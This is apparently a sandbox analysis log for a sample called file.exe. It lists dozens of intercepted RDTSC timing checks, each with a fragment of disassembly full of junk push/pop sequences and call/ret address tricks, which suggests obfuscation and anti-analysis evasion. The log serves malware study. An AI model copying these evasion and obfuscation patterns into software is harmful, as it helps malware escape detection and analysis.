Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125FD9A second address: 125FE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E68h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F39A52A2E67h 0x00000011 nop 0x00000012 mov esi, dword ptr [ebp+122D24BCh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F39A52A2E58h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 mov esi, dword ptr [ebp+122D3BDEh] 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 je 00007F39A52A2E56h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125FE0E second address: 125FE18 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126121F second address: 1261229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F39A52A2E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1261008 second address: 1261036 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F39A52A77CEh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F39A52A77D7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1261229 second address: 126125F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub esi, 2E2515F4h 0x00000011 push 00000000h 0x00000013 je 00007F39A52A2E5Ch 0x00000019 mov dword ptr [ebp+1246BBC4h], ecx 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+1245B8A0h] 0x00000027 xchg eax, ebx 0x00000028 jo 00007F39A52A2E64h 0x0000002e push eax 0x0000002f push edx 0x00000030 jng 00007F39A52A2E56h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12638EB second address: 12638EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12657CD second address: 1265809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F39A52A2E5Ch 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D37D1h], eax 0x00000015 push 00000000h 0x00000017 and ebx, dword ptr [ebp+122D3B3Eh] 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D3045h], edx 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F39A52A2E5Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264A2D second address: 1264A37 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1265809 second address: 126582B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F39A52A2E61h 0x00000008 jl 00007F39A52A2E56h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126582B second address: 126583A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jo 00007F39A52A77CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1265925 second address: 1265929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1265929 second address: 1265949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F39A52A77D0h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265949 second address: 1265A13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F39A52A2E66h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F39A52A2E58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F39A52A2E58h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 movsx ebx, si 0x0000004a mov ebx, dword ptr [ebp+122D39DEh] 0x00000050 mov dword ptr fs:[00000000h], esp 0x00000057 call 00007F39A52A2E65h 0x0000005c mov dword ptr [ebp+122D1A70h], eax 0x00000062 pop edi 0x00000063 mov eax, dword ptr [ebp+122D0E41h] 0x00000069 jmp 00007F39A52A2E64h 0x0000006e push FFFFFFFFh 0x00000070 and di, C8A8h 0x00000075 jmp 00007F39A52A2E5Fh 0x0000007a nop 0x0000007b pushad 0x0000007c jmp 00007F39A52A2E5Bh 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265A13 second address: 1265A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265A17 second address: 1265A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265A1B second address: 1265A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007F39A52A77D0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A99 second address: 1267AC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F39A52A2E5Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267AC6 second address: 1267ACC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A992 second address: 126A9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F39A52A2E56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1269C2E second address: 1269C46 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F39A52A77CBh 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B93C second address: 126B940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B940 second address: 126B952 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F39A52A77C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126BA95 second address: 126BA9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F39A52A2E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126BB76 second address: 126BBA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F39A52A77D9h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126BBA9 second address: 126BBAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CBF1 second address: 126CC02 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F39A52A77C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CC02 second address: 126CC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F39A52A2E56h 0x0000000a popad 0x0000000b jnc 00007F39A52A2E5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E96A second address: 126E96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E96F second address: 126E98C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DB63 second address: 126DB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126FA62 second address: 126FA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126FA66 second address: 126FAD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F39A52A77D4h 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D17EDh], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F39A52A77C8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jmp 00007F39A52A77D7h 0x00000034 mov di, FE49h 0x00000038 push 00000000h 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126FAD1 second address: 126FAD7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126FAD7 second address: 126FAE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F39A52A77C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271796 second address: 12717C6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F39A52A2E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jc 00007F39A52A2E5Ch 0x00000013 xor ebx, 0369E339h 0x00000019 push 00000000h 0x0000001b sbb di, A4E4h 0x00000020 push 00000000h 0x00000022 movzx ebx, di 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 jo 00007F39A52A2E56h 0x0000002f pop eax 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12729A6 second address: 12729B0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1275A2A second address: 1275A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1275A30 second address: 1275A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1275A35 second address: 1275A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1275A3B second address: 1275A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127AC49 second address: 127AC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A812 second address: 127A81B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280668 second address: 128066E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128066E second address: 1280672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280672 second address: 1280681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128079B second address: 128079F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128079F second address: 12807A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12807A3 second address: 12807C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F39A52A77D1h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12807C6 second address: 12807CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1281A79 second address: 1281AA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77D7h 0x00000007 jp 00007F39A52A77C8h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007F39A52A77CEh 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12205BD second address: 12205C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286F47 second address: 1286F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286F4B second address: 1286F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1287281 second address: 128728B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F39A52A77C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C27B second address: 128C2A8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F39A52A2E6Bh 0x00000008 jmp 00007F39A52A2E65h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F39A52A2E5Ch 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219894 second address: 1219898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219898 second address: 12198AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F39A52A2E60h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125785A second address: 12578C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D7h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F39A52A77C8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 xor edx, dword ptr [ebp+122D38DEh] 0x0000002d lea eax, dword ptr [ebp+124895D4h] 0x00000033 mov edi, dword ptr [ebp+122D1A92h] 0x00000039 nop 0x0000003a push esi 0x0000003b jl 00007F39A52A77CCh 0x00000041 ja 00007F39A52A77C6h 0x00000047 pop esi 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12578C6 second address: 12578CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12578CA second address: 12578DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257AB7 second address: 1257ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257ABB second address: 1257ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257EF4 second address: 1257EFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F39A52A2E56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257EFF second address: 1257F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push ecx 0x0000000d jnl 00007F39A52A77C6h 0x00000013 pop ecx 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257F1F second address: 1257F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125801B second address: 1258021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258021 second address: 1258025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580A9 second address: 12580AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580AE second address: 12580C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E5Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580C6 second address: 12580CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580CA second address: 12580D4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F39A52A2E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580D4 second address: 12580DE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F39A52A77CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580DE second address: 1258149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F39A52A2E58h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 jmp 00007F39A52A2E5Bh 0x00000026 mov cx, 209Ch 0x0000002a nop 0x0000002b jc 00007F39A52A2E5Eh 0x00000031 js 00007F39A52A2E58h 0x00000037 push eax 0x00000038 pop eax 0x00000039 push eax 0x0000003a pushad 0x0000003b jmp 00007F39A52A2E5Bh 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F39A52A2E64h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12582A4 second address: 12582A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12582A9 second address: 12582AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12582AF second address: 12582CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F39A52A77D1h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12587A2 second address: 12587A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258C81 second address: 1258CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D1AC7h], esi 0x00000010 lea eax, dword ptr [ebp+12489618h] 0x00000016 or dx, B510h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F39A52A77D8h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258CC5 second address: 1258D16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F39A52A2E58h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 lea eax, dword ptr [ebp+124895D4h] 0x0000002b mov dword ptr [ebp+122D1D71h], ecx 0x00000031 jl 00007F39A52A2E5Ch 0x00000037 mov edx, dword ptr [ebp+122D3B1Eh] 0x0000003d nop 0x0000003e pushad 0x0000003f jng 00007F39A52A2E5Ch 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258D16 second address: 1240B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F39A52A77CCh 0x0000000a popad 0x0000000b push eax 0x0000000c jnc 00007F39A52A77DCh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F39A52A77C8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D17EDh], esi 0x00000033 call dword ptr [ebp+1245B534h] 0x00000039 jng 00007F39A52A77EEh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240B85 second address: 1240B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E5Ch 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
